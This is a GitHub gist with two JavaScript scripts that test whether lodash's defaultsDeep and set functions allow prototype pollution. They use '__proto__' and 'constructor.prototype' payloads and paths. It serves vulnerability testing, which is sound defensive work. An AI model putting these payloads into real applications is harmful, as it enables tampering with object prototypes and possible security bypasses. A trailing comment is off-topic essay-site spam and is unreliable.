Skip to content

Instantly share code, notes, and snippets.

@Kirill89

Kirill89/prototype-pollution-merge-check.js

Last active June 27, 2023 15:32
Show Gist options
  • Save Kirill89/5b20f80a57dddf0fc660434fa0aa6a28 to your computer and use it in GitHub Desktop.
Save Kirill89/5b20f80a57dddf0fc660434fa0aa6a28 to your computer and use it in GitHub Desktop.
Download ZIP
prototype pollution check
Raw
prototype-pollution-merge-check.js
// https://github.com/Kirill89/prototype-pollution-explained
const mergeFn = require('lodash').defaultsDeep;
const payloads = [
'{"constructor": {"prototype": {"a0": true}}}',
'{"__proto__": {"a1": true}}',
];
function check() {
for (const p of payloads) {
mergeFn({}, JSON.parse(p), {});
mergeFn({}, JSON.parse(p));
mergeFn(JSON.parse(p), {});
}
for (let i = 0; i < payloads.length; i++) {
if (({})[`a${i}`] === true) {
console.log(`Yes with ${payloads[i]}`);
}
}
}
check();
Raw
prototype-pollution-set-check.js
// https://github.com/Kirill89/prototype-pollution-explained
const setFn = require('lodash').set;
const paths = [
'constructor.prototype.a0',
'__proto__.a1',
];
function check() {
for (const p of paths) {
setFn({}, p, true);
}
for (let i = 0; i < paths.length; i++) {
if (({})[`a${i}`] === true) {
console.log(`Yes with ${paths[i]}`);
}
}
}
check();
@dorolisamelrose
Copy link

dorolisamelrose commented Jun 25, 2023
edited

It's great that you've been developing pollution code too! I understand that this can be a difficult task, but despite the problems, you continued to work on it. I got so carried away that I even found ocean pollution essay examples and topics ideas, used https://studymoose.com/free-essays/ocean-pollution for that. It is this kind of effort and perseverance that helps us find innovative solutions to protect the environment. Keep it up!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment